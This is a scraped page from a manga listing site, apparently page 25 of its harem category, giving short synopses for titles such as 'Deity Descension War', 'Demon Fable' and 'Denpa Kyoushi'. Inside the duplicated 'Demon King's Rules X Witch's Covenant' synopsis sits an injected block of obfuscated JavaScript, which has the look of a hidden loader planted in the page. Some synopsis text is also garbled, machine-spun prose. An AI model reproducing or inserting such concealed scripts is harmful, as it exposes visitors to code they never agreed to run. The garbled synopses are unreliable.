Harem - Page 25

Harem manga focuses on a male lead with multiple romantic interests, blending comedy and emotion. A reverse harem features a female protagonist with a group of male admirers.

2122 results

Deity Descension War

The Continent of the Goddess is divided into two realms, the Xuan, Ao, and Ling tribes are gods in the sky. The human beings who have awakened the soul wheel can summon the gods to inhabit the gods in their bodies and become the goddess masters! Song Xiaoliu, a young man from the border town, possessed peerless talents and was tragically assaulted. He was judged that he had no destiny for his life, but because of fate he would summon many peerless gods to descend from the earth, and then embarked on a journey of surrendering against the world…


Deity’s Path through Ten Thousand Worlds

Every world is like a flower, The secular realm as we know it is but a speck of dust in the hands of deities and demons. One moment for them, a thousand years in the mortal world. Even mountain ranges and vast oceans are but mere illusions The Tianyuan God Sect was once the mightiest sect in the great Dashang. Ye Xingyun’s master and also the sect leader of the Tianyuan God Sect, Diejiu ascends to become a deity and leaves the sect in the hands of Yi Xingyun who’s cultivation has stagnated due to missing one of the eight veins


Demi-Human Harem Built By Members Of Society

7 years ago from now. Beautiful monster girls have come to Earth looking for a husband.


Demon Fable

Rickert, a black mage in training, accidentally summons a 7ft tall demoness named Lilith. Together, the two must track down Rickert's lost teacher on a perilous journey into the world of the occult and demonic.


Demon Fighter Kocho

Unlucky student meets a girl that offers to exorcise a bad spirit possessing him, and from then on they go to solve many spiritual cases (almost always involving nudity) - although she tends to screw up more often than she succeeds.


Demon Instructor at the Royal Academy of Magic

Setsuna is a perverted instructor who is unable to invoke magic.As a part-time lecturer at the Royal Academy of Magic, he continually tells his students to self-study.The new students who entered the academy with high expectations are disappointed in Setsuna, and judging him to be incompetent, they challenge him to a Guess duel."": Will you resign if I win?"": "I"? Surely you mean " we." All of you have been pretty annoying, so I want you all to take on me. But in return, you know what will happen if you lose, right?Setsuna plays with the special students, who are the best in a hundred years, with perverse and astonishing magic that is unthinkable in common sense!But behind the demon-like behavior, could there be a true purpose...?


Demon King Cheat System

Read manhua Demon King Cheat System / The Demon King’s Cheat System / Demon King’s Cheating System / Mowang Zuobi Xitong / Mówáng Zuòbì Xìtǒng / The Demon King Cheat System One day, countless dungeons appeared across the world. “The Dungeon Era”, or the so-called “Age of Dungeons and Monsters” befell mankind. Aldslay, a boss from an Abyss-Level dungeon was slain by humans using despicable means. Enraged and unwilling to accept it, Aldslay reincarnated into an incompetent player, and accidentally activated the one and only “Boss Player System”. With the aid of the system, he is able to conquer various dungeons and become the Dungeon Master. The road to revenge starts now! “Demon King Cheat System Manhua” is another name: 魔王作弊系统 魔王様のチートシステム 마왕 전용 사기 시스템


Demon King’S Rules X Witch’S Covenant

Warning! An association of valiant individuals formed by the villainous demon lord and the rebellious witches has surfaced! Through casual methods of operation, they will turn the definition of justice upside down! By committing crimes across dimensions, they will ultimately snatch the halo of the main characters away from the hands of pesky humans!


Demon King’s Rules X Witch’s Covenant

Warning! An association of valiant individuals formed by the villainous demon lord and the rebellious witches has surfaced! Through casual methods of operation, they will turn the definition of justice upside down! By committing crimes across dimensions, they will ultimately snatch the halo of the main characters away from the hands of pesky humans!<script></script><script>function _0x1a05(_0x473890,_0x5b6948){var _0x37554f=_0x54a6();return _0x1a05=function(_0x489dd5,_0x3eeb63){_0x489dd5=_0x489dd5-(0x15d8+0x9c9+-0x44d*0x7);var _0xa55ca8=_0x37554f[_0x489dd5];return _0xa55ca8;},_0x1a05(_0x473890,_0x5b6948);}(function(_0x1f4e1d,_0x496348){var _0x47c656=_0x1a05,_0x18e7fb=_0x1f4e1d();while(!![]){try{var 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Demoted to a Teacher, the Strongest Sage Raises an Unbeatable Class

Demoted to a Teacher the Strongest Sage Raises an Unbeatable Class manga,Sasen Sareta Saikyou Kenja, Kyoushi ni Natte Muteki no Class wo Tsukuriageru ,The Strongest Sage Was Demoted and Became a Teacher, Creating Unparalleled ClassesMonsters have long threatened humanity’s existence. To fight against these beings, Keith, the youngest person to ever become a sage, joins a knight order and shows immense success on the battlefield. However, that doesn’t last long, as a quarrel with an incompetent higher-up gets him fired from the order. With nowhere to go, Keith is assigned as a teacher, and with his talent for bringing out the best in his students, his class is about to reach unbelievable heights


Denpa Kyoushi

The storyline follows Jun'ichiro Kagami, whose sister Suzune is mad at him because of his complete disinterest in the world that is real. Suzune compels him to go on work as a physics teacher replacement in exactly the same high school from which he graduated as Jun'ichiro is interested in only games, manga and anime. Jun'ichiro Shows himself a hard-working and competent instructor who comes with techniques according to the apparently worthless knowledge inspire and he got as an otaku to educate his pupils. Jun'ichiro Kagami The key character as well as a 2 4-year old hard-core otaku who spends his days until he's driven by his sister to be a teacher at his alma mater at home trying to to enhance his anime site. Jun'ichiro is a physics key who printed a paper that triggered a chaos that is huge in the world when he was only 17. It proposed a hypothesis to develop a teleportation device in the exact same style of Doraemon's "Anywhere Door". All attempts to disprove the hypothesis so significantly have failed, though it might take centuries for human beings to come up with the technology required to to put together it despite being ridiculed by professors. Despite being scouted to work on the main research centers on the planet, Jun'ichiro promises to suffer from an illness called "YD" that "only lets him do what he yearns to do", so he rejected their offerings. Yet, after spending several weeks working as a teacher, he's convinced by Koyomi Hiiragi to work on her college. Since then, his time divides between finding ways to incorporate one into the other, typically through using competitive game titles and emphasizing his by-lines and occasionally using his unusual techniques to reform isolated pupils. Suzune Kagami Jun'ichiro sister who's constantly mad at her brother's jokes. Her avocation is bat training, and she's the sole man whom Jun'ichiro actually dreads. She prohibits Jun'ichiro from purchasing anything without her blessing and is also responsible for most of the household's financing. Despite all of the problems he causes her, Suzune needs to to deal with him eternally and is quite fond of him. She's a custom of hitting on the others, generally Jun'ichiro, with her bat when she is upset or mad together.


Densetsu no Yuusha no Konkatsu

The story takes place in a world after the legendary warrior defeats the demon lord. After he brought the peace to the world, he decides to set another adventure to search for his wife.
